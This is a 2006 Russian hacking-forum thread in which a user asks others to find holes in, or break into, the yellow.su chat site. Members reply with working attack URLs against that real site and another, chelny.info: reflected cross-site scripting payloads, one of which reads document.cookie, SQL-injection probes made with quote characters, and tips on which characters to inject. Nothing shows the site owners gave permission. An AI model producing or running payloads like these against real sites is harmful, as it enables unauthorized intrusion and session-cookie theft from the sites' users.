Чаты yellow.su нереально взломать многие пытаються кто сможе узнайте дыры

Discussion in 'Веб-уязвимости' started by robot410, 30 Nov 2006.

Thread Status:
Not open for further replies.
  1. robot410

    robot410 New Member

    Joined:
    19 Nov 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Узнайте пожалуста дыры в это чате )) а может кто и взломает ОТБЛАГОДАРЮ
     
  2. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    чат сто пудово самописный, стока там наверченно, щаз глянем!
    и ваще! надо блин зарегать несколько ников, а то лень регаться
     
    #2 alextoun, 30 Nov 2006
    Last edited: 30 Nov 2006
  3. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    http://www.yellow.su/sys/index.phtml?str=top&sel_by=1&expar[0]=3&gender='&nick=&by=0
     
  4. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    http://www.yellow.su/sys/registration.phtml?nick=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://www.yellow.su/sys/index.phtml просто ошибка вылезает
    http://www.yellow.su/?act=room&sid=7466918146&room=4'
    уже другая ошибка
    http://yellow.su/?act=room&sid=8105585192&room=55
     
    #4 VampiRUS, 30 Nov 2006
    Last edited: 30 Nov 2006
    1 person likes this.
  5. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Хы я так понял то админ чата %)

    http://www.yellow.su/sys/registration.phtml?nick=script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    http://www.chelny.info/price3.phtml?check_net=&check_email='&check_zip='&check_credit='&check_map='&find1=&selhref=&selpost=&city='&kateg1=%FD18&kateg2='&page='
     
    #5 gemaglabin, 30 Nov 2006
    Last edited: 30 Nov 2006
    1 person likes this.
  6. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    http://www.yellow.su/obzor.php?doc=chelny&page=1%3Cscript%3Ealert()%3C/script%3E
     
  7. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Да там вабде ПОПА!!)) я за 10 минут, пока чай пил, стока накалупал..а есиб дальше...аж страшно плин!

    символы для скул: '",%00',%27 и т.д. )) к нику, полу ,возрасту...похрен ))

    http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=>"><ScRiPt%20%0a%0d>alert(1)%3B</ScRiPt>&gender=%2527&[email protected]&by=0
     
    1 person likes this.
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 gemaglabin
    Верняк)) я тож так понял))

    http://www.yellow.su:80/sys/?str=top&sel_by=1&expar%5B0%5D=0&gender=%2527&nick="+onmouseover="alert(1141737531)&by=0

    круто выглядит))
     
    #8 $n@ke, 30 Nov 2006
    Last edited: 30 Nov 2006
    2 people like this.
  9. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    http://www.yellow.su/sys/left.phtml?&expar[0]=%22%3E%3Cscript%3Ealert()%3C/script%3E&sid=1425734781
    наверное там ещё куча чего но мне надоело

    нет вот последняя))
    http://www.yellow.su/sys/grpwork.phtml?expar[1]=1&sid=1425734781&expar[2]=322575'
     
    #9 VampiRUS, 30 Nov 2006
    Last edited: 30 Nov 2006
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Слышь, топик стартер, запусти сканер какой нить - и смари!!!
    А то мы тему во флудилку превратим))) одна дыра за другой....
    Так ты реальна админ?
     
  11. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Топикстартер, походу, таким своеобразным способом решил привлечь людей к поиску уязвимостей...
     
  12. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Щас наверно топикстартер побежал перед админом выламыватся, что это он всё нашёл. Хотя я могу и ошибатся. В общем уязвимости нашли, тема закрыта.
     
Thread Status:
Not open for further replies.